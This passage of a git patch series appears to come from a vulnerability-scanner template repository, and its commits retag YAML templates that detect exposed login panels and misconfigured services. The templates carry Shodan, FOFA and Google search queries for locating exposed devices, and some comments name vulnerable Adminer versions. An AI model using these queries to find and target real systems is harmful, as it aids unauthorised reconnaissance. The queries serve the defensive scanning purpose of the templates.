info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,login,tech,spiderfoot + tags: panel,login,spiderfoot metadata: max-request: 1 diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index 0c94022c1c..084c649c22 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -4,7 +4,7 @@ info: name: Synology RackStation Login Detect author: princechaddha severity: info - tags: login,tech,synology,rackstation,panel + tags: login,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/xds-amr-status.yaml b/http/exposed-panels/xds-amr-status.yaml index 46b5092600..50753824b4 100644 --- a/http/exposed-panels/xds-amr-status.yaml +++ b/http/exposed-panels/xds-amr-status.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: 'http.title:"XDS-AMR - status"' - tags: panel,tech,xamr,xds + tags: panel,xamr,xds http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index b4cf52424d..a63d770449 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VMG1312-B10D" - tags: tech,zyxel,modem,router,panel + tags: zyxel,modem,router,panel http: - method: GET diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 96b9b99c8e..29803e12ae 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"VSG1432-B101" - tags: tech,zyxel,modem,router,panel + tags: zyxel,modem,router,panel http: - method: GET From 6bd8403df2f14e484f567c31ce075acc7eb0647b Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:33:25 -0700 Subject: [PATCH 142/609] remove tech tag from exposures templates --- http/exposures/logs/clockwork-php-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index 549594aa52..6f40d7a532 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/damian_89_/status/1250721398747791360 - tags: tech,clockwork + tags: clockwork metadata: max-request: 1 From 9921dfc33cc9e313cd51c7ba31829ce8a43e9915 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:49:22 -0700 Subject: [PATCH 143/609] fix bugs --- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmk-login.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-install.yaml | 2 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/gnu-mailman.yaml | 2 +- http/exposed-panels/gryphon-login.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kubernetes-enterprise-manager.yaml | 2 +- http/exposed-panels/kubernetes-mirantis.yaml | 2 +- http/exposed-panels/laravel-filemanager.yaml | 2 +- http/exposed-panels/luci-login-detection.yaml | 2 +- http/exposed-panels/magento-downloader-panel.yaml | 2 +- http/exposed-panels/mautic-crm-panel.yaml | 2 +- http/exposed-panels/openbmcs-detect.yaml | 2 +- http/exposed-panels/opencpu-panel.yaml | 2 +- http/exposed-panels/roxy-fileman.yaml | 2 +- http/exposed-panels/sap-successfactors-detect.yaml | 2 +- http/exposed-panels/server-backup-login.yaml | 2 +- http/exposures/files/secrets-file.yaml | 2 +- http/exposures/logs/clockwork-php-page.yaml | 2 +- http/misconfiguration/ampps-dirlisting.yaml | 2 +- http/misconfiguration/apache/tomcat-pathnormalization.yaml | 2 +- http/misconfiguration/bootstrap-admin-panel-template.yaml | 2 +- http/misconfiguration/command-api-explorer.yaml | 2 +- http/misconfiguration/deos-openview-admin.yaml | 2 +- http/misconfiguration/dgraph-dashboard-exposure.yaml | 2 +- http/misconfiguration/exposed-service-now.yaml | 2 +- http/misconfiguration/installer/avideo-install.yaml | 2 +- http/misconfiguration/installer/circarlife-setup.yaml | 2 +- http/misconfiguration/installer/mcloud-installer.yaml | 2 +- http/misconfiguration/installer/openshift-installer-panel.yaml | 2 +- http/misconfiguration/installer/wp-install.yaml | 2 +- http/misconfiguration/installer/zenphoto-setup.yaml | 2 +- http/misconfiguration/iot-vdme-simulator.yaml | 2 +- http/misconfiguration/misconfigured-docker.yaml | 2 +- http/misconfiguration/nomad-jobs.yaml | 2 +- http/misconfiguration/oneinstack-control-center.yaml | 2 +- http/misconfiguration/pghero-dashboard-exposure.yaml | 2 +- http/misconfiguration/setup-github-enterprise.yaml | 2 +- http/misconfiguration/struts-ognl-console.yaml | 2 +- http/misconfiguration/tls-sni-proxy.yaml | 2 +- http/misconfiguration/unauth-fastvue-dashboard.yaml | 2 +- http/misconfiguration/zenphoto-sensitive-info.yaml | 2 +- 45 files changed, 45 insertions(+), 45 deletions(-) diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 69ab73299d..bbe88039ae 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: fuzz,adminer,login + tags: fuzz,adminer,login,panel # <= 4.2.4 can have unauthenticated RCE via SQLite driver # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL diff --git a/http/exposed-panels/avtech-dvr-exposure.yaml b/http/exposed-panels/avtech-dvr-exposure.yaml index daca8d9bb6..939d01c109 100644 --- a/http/exposed-panels/avtech-dvr-exposure.yaml +++ b/http/exposed-panels/avtech-dvr-exposure.yaml @@ -7,7 +7,7 @@ info: description: AVTECH AVC798HA DVR is susceptible to information exposure. CGI scripts in the /cgi-bin/nobody directory can be accessed without authentication. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - http://www.avtech.com.tw/ - tags: dvr,avpanel + tags: dvr,avtech,panel metadata: max-request: 1 diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index 1b97b5ee39..8a370533ea 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: cacti,login + tags: cacti,login,panel metadata: max-request: 2 diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 14e8742e56..2d521a195d 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,synology,rackstation + tags: login,synology,rackstation,panel metadata: max-request: 1 diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index ed8e7edf2d..2b7d52c7b9 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.favicon.hash:-1961736892 fofa-query: title="dzzoffice" - tags: dzzoffice,install + tags: dzzoffice,install,panel http: - method: GET diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index 25766474da..5df7f8e2e4 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login,edgeos,edgemax + tags: login,edgeos,edgemax,panel metadata: max-request: 1 diff --git a/http/exposed-panels/gnu-mailman.yaml b/http/exposed-panels/gnu-mailman.yaml index 21d5441c52..62576e0c26 100644 --- a/http/exposed-panels/gnu-mailman.yaml +++ b/http/exposed-panels/gnu-mailman.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: title:"Mailing Lists" - tags: mailman + tags: mailman,panel http: - method: GET diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml index ab38df9d2b..34e6f4eb49 100644 --- a/http/exposed-panels/gryphon-login.yaml +++ b/http/exposed-panels/gryphon-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Gryphon" - tags: gryphon,router + tags: gryphon,router,panel http: - method: GET diff --git a/http/exposed-panels/konga-panel.yaml b/http/exposed-panels/konga-panel.yaml index 271ca5f553..0233af7a0c 100644 --- a/http/exposed-panels/konga-panel.yaml +++ b/http/exposed-panels/konga-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: konga,oss + tags: konga,oss,panel metadata: max-request: 1 diff --git a/http/exposed-panels/kubernetes-enterprise-manager.yaml b/http/exposed-panels/kubernetes-enterprise-manager.yaml index 372449976f..306a488958 100644 --- a/http/exposed-panels/kubernetes-enterprise-manager.yaml +++ b/http/exposed-panels/kubernetes-enterprise-manager.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 fofa-query: app="Kubernetes-Enterprise-Manager" - tags: kubernetes + tags: kubernetes,panel http: - method: GET diff --git a/http/exposed-panels/kubernetes-mirantis.yaml b/http/exposed-panels/kubernetes-mirantis.yaml index 4c59df79b0..e392d8cf0a 100644 --- a/http/exposed-panels/kubernetes-mirantis.yaml +++ b/http/exposed-panels/kubernetes-mirantis.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.html:"Mirantis Kubernetes Engine" fofa-query: app="Mirantis-Kubernetes-Engine" - tags: kubernetes,devops,kube,k8s + tags: kubernetes,devops,kube,k8s,panel http: - method: GET diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml index 819b5008e5..21018323db 100644 --- a/http/exposed-panels/laravel-filemanager.yaml +++ b/http/exposed-panels/laravel-filemanager.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: laravel,filemanager,fileupload + tags: laravel,filemanager,fileupload,panel metadata: max-request: 1 diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml index 72bfec5eca..0e57755c52 100644 --- a/http/exposed-panels/luci-login-detection.yaml +++ b/http/exposed-panels/luci-login-detection.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: login + tags: login,panel metadata: max-request: 1 diff --git a/http/exposed-panels/magento-downloader-panel.yaml b/http/exposed-panels/magento-downloader-panel.yaml index 4c44955b02..570fc98ead 100644 --- a/http/exposed-panels/magento-downloader-panel.yaml +++ b/http/exposed-panels/magento-downloader-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.component:"Magento" - tags: magento + tags: magento,panel http: - method: GET diff --git a/http/exposed-panels/mautic-crm-panel.yaml b/http/exposed-panels/mautic-crm-panel.yaml index cbad1023e7..f88142f2f2 100644 --- a/http/exposed-panels/mautic-crm-panel.yaml +++ b/http/exposed-panels/mautic-crm-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: mautic,crm + tags: mautic,crm,panel metadata: max-request: 1 diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml index f0a87b0513..f5d3f00eaa 100644 --- a/http/exposed-panels/openbmcs-detect.yaml +++ b/http/exposed-panels/openbmcs-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: openbmcs,detect + tags: openbmcs,detect,panel metadata: max-request: 1 diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml index 53dd936588..d9bc051e69 100644 --- a/http/exposed-panels/opencpu-panel.yaml +++ b/http/exposed-panels/opencpu-panel.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: opencpu,oss + tags: opencpu,oss,panel metadata: max-request: 1 diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index 8ce126dd83..da86568ad8 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: fileupload,roxy,fileman + tags: fileupload,roxy,fileman,panel http: - method: GET diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index 0447999ff6..7c2fa348dd 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -13,7 +13,7 @@ info: max-request: 2 verified: true shodan-query: title:"Login - SAP SuccessFactors" - tags: sap,detect + tags: sap,detect,panel http: - method: GET diff --git a/http/exposed-panels/server-backup-login.yaml b/http/exposed-panels/server-backup-login.yaml index d0fa6f52ba..58adb05ba2 100644 --- a/http/exposed-panels/server-backup-login.yaml +++ b/http/exposed-panels/server-backup-login.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: paneil,idera,edb + tags: panel,idera,edb metadata: max-request: 1 diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index e455768a41..4f70612ba2 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -9,7 +9,7 @@ info: max-request: 4 verified: true google-query: intitle:"index of" "secrets.yml" - tags: cloud,devops,files + tags: cloud,devops,files,exposure http: - method: GET diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index 6f40d7a532..b8af24fe07 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://twitter.com/damian_89_/status/1250721398747791360 - tags: clockwork + tags: clockwork,exposure metadata: max-request: 1 diff --git a/http/misconfiguration/ampps-dirlisting.yaml b/http/misconfiguration/ampps-dirlisting.yaml index 8e5f9ae11f..32665d9fa5 100644 --- a/http/misconfiguration/ampps-dirlisting.yaml +++ b/http/misconfiguration/ampps-dirlisting.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 cwe-id: CWE-200 - tags: panel,ampps,softaculous,misconfig + tags: ampps,softaculous,misconfig metadata: max-request: 3 diff --git a/http/misconfiguration/apache/tomcat-pathnormalization.yaml b/http/misconfiguration/apache/tomcat-pathnormalization.yaml index 50e48010cc..32f6799d93 100644 --- a/http/misconfiguration/apache/tomcat-pathnormalization.yaml +++ b/http/misconfiguration/apache/tomcat-pathnormalization.yaml @@ -10,7 +10,7 @@ info: cvss-score: 0.0 cwe-id: CWE-200 reference: https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - tags: panel,tomcat,apache,misconfig + tags: tomcat,apache,misconfig metadata: max-request: 6 diff --git a/http/misconfiguration/bootstrap-admin-panel-template.yaml b/http/misconfiguration/bootstrap-admin-panel-template.yaml index b4b3125351..575d3490bb 100644 --- a/http/misconfiguration/bootstrap-admin-panel-template.yaml +++ b/http/misconfiguration/bootstrap-admin-panel-template.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"Dashboard - Bootstrap Admin Template" - tags: bootstrap,panel,misconfig + tags: bootstrap,misconfig http: - method: GET diff --git a/http/misconfiguration/command-api-explorer.yaml b/http/misconfiguration/command-api-explorer.yaml index b36d832462..226da45cc3 100644 --- a/http/misconfiguration/command-api-explorer.yaml +++ b/http/misconfiguration/command-api-explorer.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.html:"Command API Explorer" - tags: panel,misconfig + tags: misconfig http: - method: GET diff --git a/http/misconfiguration/deos-openview-admin.yaml b/http/misconfiguration/deos-openview-admin.yaml index 6d905b255b..819d4383db 100644 --- a/http/misconfiguration/deos-openview-admin.yaml +++ b/http/misconfiguration/deos-openview-admin.yaml @@ -10,7 +10,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-284 - tags: openview,disclosure,panel,misconfig + tags: openview,disclosure,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/dgraph-dashboard-exposure.yaml b/http/misconfiguration/dgraph-dashboard-exposure.yaml index 2cd78dde03..2c58bfa1a3 100644 --- a/http/misconfiguration/dgraph-dashboard-exposure.yaml +++ b/http/misconfiguration/dgraph-dashboard-exposure.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Dgraph Ratel Dashboard" - tags: unauth,panel,misconfig + tags: unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/exposed-service-now.yaml b/http/misconfiguration/exposed-service-now.yaml index 5b824e7385..37c81d2329 100644 --- a/http/misconfiguration/exposed-service-now.yaml +++ b/http/misconfiguration/exposed-service-now.yaml @@ -8,7 +8,7 @@ info: reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ - tags: servicenow + tags: servicenow,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/avideo-install.yaml b/http/misconfiguration/installer/avideo-install.yaml index 9eaed6424b..58ec93617a 100644 --- a/http/misconfiguration/installer/avideo-install.yaml +++ b/http/misconfiguration/installer/avideo-install.yaml @@ -14,7 +14,7 @@ info: verified: true shodan-query: http.title:"AVideo" fofa-query: "AVideo" - tags: panel,install,avideo,misconfig + tags: install,avideo,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 1a274b2ac5..75f192b16b 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"- setup" html:"Modem setup" - tags: scada,circontrol,circarlife,setup,panel,installer,misconfig + tags: scada,circontrol,circarlife,setup,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/mcloud-installer.yaml b/http/misconfiguration/installer/mcloud-installer.yaml index 6b469b7123..707bbd8f94 100644 --- a/http/misconfiguration/installer/mcloud-installer.yaml +++ b/http/misconfiguration/installer/mcloud-installer.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"mcloud-installer-web" - tags: panel,mcloud,misconfig + tags: mcloud,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/openshift-installer-panel.yaml b/http/misconfiguration/installer/openshift-installer-panel.yaml index 3b035b14bf..d3e1fd2e30 100644 --- a/http/misconfiguration/installer/openshift-installer-panel.yaml +++ b/http/misconfiguration/installer/openshift-installer-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: title:"OpenShift Assisted Installer" - tags: panel,openshift,cluster,misconfig + tags: openshift,cluster,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/wp-install.yaml b/http/misconfiguration/installer/wp-install.yaml index d1eaff6cca..7706f2d3cc 100644 --- a/http/misconfiguration/installer/wp-install.yaml +++ b/http/misconfiguration/installer/wp-install.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-284 reference: - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ - tags: panel,wordpress + tags: wordpress,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/installer/zenphoto-setup.yaml b/http/misconfiguration/installer/zenphoto-setup.yaml index df0e235c43..ba11b7cdee 100644 --- a/http/misconfiguration/installer/zenphoto-setup.yaml +++ b/http/misconfiguration/installer/zenphoto-setup.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true shodan-query: title:"Zenphoto install" - tags: panel,zenphoto,setup,installer + tags: zenphoto,setup,installer,misconfig http: - method: GET diff --git a/http/misconfiguration/iot-vdme-simulator.yaml b/http/misconfiguration/iot-vdme-simulator.yaml index c8d292ccbc..06e97392e4 100644 --- a/http/misconfiguration/iot-vdme-simulator.yaml +++ b/http/misconfiguration/iot-vdme-simulator.yaml @@ -14,7 +14,7 @@ info: max-request: 2 verified: true shodan-query: http.title:"IoT vDME Simulator" - tags: misconfig,panel + tags: misconfig http: - method: GET diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml index 277e829263..41b1f7bda5 100644 --- a/http/misconfiguration/misconfigured-docker.yaml +++ b/http/misconfiguration/misconfigured-docker.yaml @@ -7,7 +7,7 @@ info: description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon. reference: - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html - tags: docker,unauth,devops + tags: docker,unauth,devops,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index 09a80a8e7e..89b8fe06a7 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel,misconfig + tags: nomad,devops,hashicorp,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index 1341cc8055..41d83f9467 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -17,7 +17,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OneinStack" - tags: misconfig,panel,oneinstack + tags: misconfig,oneinstack http: - method: GET diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index 87b5274549..f80a6e6c35 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -15,7 +15,7 @@ info: max-request: 1 verified: true shodan-query: title:"PgHero" - tags: panel,pghero,misconfig + tags: pghero,misconfig http: - method: GET diff --git a/http/misconfiguration/setup-github-enterprise.yaml b/http/misconfiguration/setup-github-enterprise.yaml index fe16ef1415..fbed7d76b4 100644 --- a/http/misconfiguration/setup-github-enterprise.yaml +++ b/http/misconfiguration/setup-github-enterprise.yaml @@ -8,7 +8,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1373456171 - tags: panel,setup,github,misconfig + tags: setup,github,misconfig http: - method: GET diff --git a/http/misconfiguration/struts-ognl-console.yaml b/http/misconfiguration/struts-ognl-console.yaml index 56d225cb00..4d98416f7b 100644 --- a/http/misconfiguration/struts-ognl-console.yaml +++ b/http/misconfiguration/struts-ognl-console.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: html:"Struts Problem Report" - tags: apache,struts,ognl,panel,misconfig + tags: apache,struts,ognl,misconfig http: - method: GET diff --git a/http/misconfiguration/tls-sni-proxy.yaml b/http/misconfiguration/tls-sni-proxy.yaml index 5bb5eeee62..f3bf8e534a 100644 --- a/http/misconfiguration/tls-sni-proxy.yaml +++ b/http/misconfiguration/tls-sni-proxy.yaml @@ -7,7 +7,7 @@ info: reference: - https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/ - https://www.bamsoftware.com/computers/sniproxy/ - tags: ssrf,oast,tls,sni,proxy + tags: ssrf,oast,tls,sni,proxy,misconfig metadata: max-request: 1 diff --git a/http/misconfiguration/unauth-fastvue-dashboard.yaml b/http/misconfiguration/unauth-fastvue-dashboard.yaml index dba2300793..62f215ecdc 100644 --- a/http/misconfiguration/unauth-fastvue-dashboard.yaml +++ b/http/misconfiguration/unauth-fastvue-dashboard.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.favicon.hash:-1117549627 - tags: panel,fastvue,unauth,misconfig + tags: fastvue,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml index e71e09c154..c15b8f0011 100644 --- a/http/misconfiguration/zenphoto-sensitive-info.yaml +++ b/http/misconfiguration/zenphoto-sensitive-info.yaml @@ -5,7 +5,7 @@ info: author: qlkwej severity: medium description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure - tags: unauth + tags: unauth,misconfig metadata: max-request: 4 From a144d1c456b45e346ce53efb6620445f8e2edb35 Mon Sep 17 00:00:00 2001 From: ErikOwen Date: Fri, 2 Jun 2023 16:55:38 -0700 Subject: [PATCH 144/609] fix bugs found in diff --- http/exposed-panels/avtech-avn801-camera-panel.yaml | 2 +- http/exposed-panels/openwrt-login.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/avtech-avn801-camera-panel.yaml b/http/exposed-panels/avtech-avn801-camera-panel.yaml index 8c05fa6ea3..c7872801c2 100644 --- a/http/exposed-panels/avtech-avn801-camera-panel.yaml +++ b/http/exposed-panels/avtech-avn801-camera-panel.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: title:"login" product:"Avtech AVN801 network camera" - tags: panel,aviot,camera + tags: panel,avtech,iot,camera http: - method: GET diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 3162f7e958..d5f773d5b5 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -2,7 +2,7 @@ id: openwrt-login info: name: Opentwrt Login / Configuration Interface - author: For3stCo1dbrunchFR + author: For3stCo1d,TechbrunchFR severity: info reference: - https://openwrt.org From ffd3754f686c09f125d53e9de8da50f0c48c27f5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 6 Jun 2023 03:45:15 +0530 Subject: [PATCH 145/609] syntax fixes --- http/misconfiguration/aem/aem-secrets.yaml | 1 - http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml | 1 - http/misconfiguration/ibm-websphere-xml.yaml | 1 - network/cves/2016/CVE-2016-3510.yaml | 1 - 4 files changed, 4 deletions(-) diff --git a/http/misconfiguration/aem/aem-secrets.yaml b/http/misconfiguration/aem/aem-secrets.yaml index e949d24cca..2c22854abc 100644 --- a/http/misconfiguration/aem/aem-secrets.yaml +++ b/http/misconfiguration/aem/aem-secrets.yaml @@ -12,7 +12,6 @@ info: max-request: 2 verified: true tags: aem,adobe,misconfig - verified: "true" http: - method: GET diff --git a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml index 508c487dd8..4cfceb31ac 100644 --- a/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml +++ b/http/misconfiguration/akamai/akamai-s3-cache-poisoning.yaml @@ -16,7 +16,6 @@ info: max-request: 204 verified: true tags: cache,poisoning,generic,xss,akamai,s3,misconfig - verified: "true" variables: rand: "{{rand_base(5)}}" diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 10439762ed..5c6b2d6257 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -12,7 +12,6 @@ info: max-request: 1 verified: true 